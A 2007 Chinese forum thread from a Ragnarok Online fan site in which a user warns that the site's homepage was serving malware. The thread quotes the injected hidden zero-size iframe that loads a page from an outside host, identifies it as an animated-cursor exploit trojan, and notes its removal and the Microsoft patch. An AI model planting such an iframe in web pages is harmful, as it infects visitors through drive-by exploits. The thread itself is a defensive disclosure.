浆糊论坛-RO小站 » RO 1.5交流区（原RO交流区） » 注意！小站主页确实有毒【已清除】

返回列表发帖

Rank: 1

UID: 416597
帖子: 75
精华: 0
威望: 0
阅读权限: 100
注册时间: 2007-3-26

1^# 跳转到 » 倒序看帖

字体大小: tT

发表于 2007-6-24 18:12 | 显示全部帖子

[历史] 注意！小站主页确实有毒【已清除】

查看源代码，可以看到这么一行代码：

<iframe src=http://WWW.86DX.NET/bb.htm width=0 height=0></iframe>

复制代码

初步估计是ARP欺骗挂马。
请不要点击上面的链接。

NOD32 以及 McAfee 反病毒软件报告存在病毒。

请大家注意。

希望小站站长或相关管理人员联系你们的机房处理。查找感染ARP欺骗蠕虫的机器。

@22:00:00
已清除了。

[ 本帖最后由 Aka 于 2007-6-24 22:10 编辑 ]

0

顶
踩

Rank: 1

UID: 416597
帖子: 75
精华: 0
威望: 0
阅读权限: 100
注册时间: 2007-3-26

2^#

发表于 2007-6-24 18:19 | 显示全部帖子

进一步分析

属于光标漏洞木马

2007-6-24 18:09:39 已删除 ZXAFFDASDADQ\Administrator flashget.exe G:\Downloads\9.js.jc! Exploit-ANIfile.c (特洛伊)

Rank: 1

UID: 416597
帖子: 75
精华: 0
威望: 0
阅读权限: 100
注册时间: 2007-3-26

3^#

发表于 2007-6-24 18:29 | 显示全部帖子

只要你安装了微软的光标漏洞补丁，就不用担心。

如果你的机器没有安装补丁，快到微软的主页上下载补丁安装吧。